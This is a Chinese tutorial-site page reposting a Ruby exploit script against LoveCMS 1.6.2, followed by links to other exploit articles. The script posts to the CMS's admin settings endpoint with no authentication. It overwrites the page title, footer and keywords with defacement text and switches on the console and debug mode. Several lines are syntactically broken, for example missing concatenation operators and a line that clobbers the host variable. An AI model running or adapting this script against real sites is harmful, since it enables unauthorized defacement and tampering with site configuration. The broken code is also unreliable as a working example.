手机
当前位置:查字典教程网 >网络安全 >Exploit >LoveCMS 1.6.2 Final Update Settings Remote Exploit
LoveCMS 1.6.2 Final Update Settings Remote Exploit
摘要:#!/usr/bin/ruby###ExploitbyPoMdaPiMp!##---------------------##pomdapim...

#!/usr/bin/ruby

#

## Exploit by PoMdaPiMp!

## ---------------------

## pomdapimp(at)gmail(dotcom)

##

## LoveCMS Exploit Series

## Episode 3: changing site settings ...

##

## Description: Simply change the site settings !

##

## Usage: ./LoveCMS_3_settings.rb <host>

## Ex: ./LoveCMS_2_themes.rb http://site.com/lovecms/

##

## Tested on: lovecms_1.6.2_final (MacOS X, Xampp)

#

require 'net/http'

require 'uri'

@host = 'http://127.0.0.1/lovecms_1.6.2_final/lovecms/'

@post_vars = {}

@post_vars['submit'] = 1

@post_vars['pagetitle'] = 'P4g3T1t1le'

@post_vars['sitename'] = 'SiteN4me'

@post_vars['slogan'] = 'By PoMdaPiMp.'

@post_vars['footer'] = 'PoMdaPiMp was here.'

@post_vars['description'] = 'Ruby is a gift.'

@post_vars['keywords'] = 'PoMdaPiMp, hack'

@post_vars['encoding'] = 'utf-8'

@post_vars['tips'] = 'off'

@post_vars['console'] = 'on'

@post_vars['debugmode'] = 'on'

@post_vars['module'] = 2

@post_vars['love_root'] = ''

@post_vars['love_url'] = ''

@host = ARGV[0] if ARGV[0]

@host = @host[-1, 1].to_s != '/' ? '/' : ''

if @host

# --

puts " LoveCMS Exploit Series. #3: Messing with settings."

puts

puts " : Attacking host: " @host

# --

# Changing settings

res = Net::HTTP.post_form(URI.parse(@host 'system/admin/themes.php'),

@post_vars)

puts " :: Values set."

@post_vars.each do |k, v|

puts " " k.to_s " > " v.to_s

end

# --

puts

puts " - Visit " @host

end

【LoveCMS 1.6.2 Final Update Settings Remote Exploit】相关文章:

PhotoPost vBGallery 2.4.2 Arbitrary File Upload Vulnerability

Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

Dana IRC 1.4a Remote Buffer Overflow Exploit

BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit

BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service

phsBlog 0.2 Bypass SQL Injection Filtering Exploit

Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability

MS Internet Explorer (FTP Server Response) DoS Exploit

精品推荐
分类导航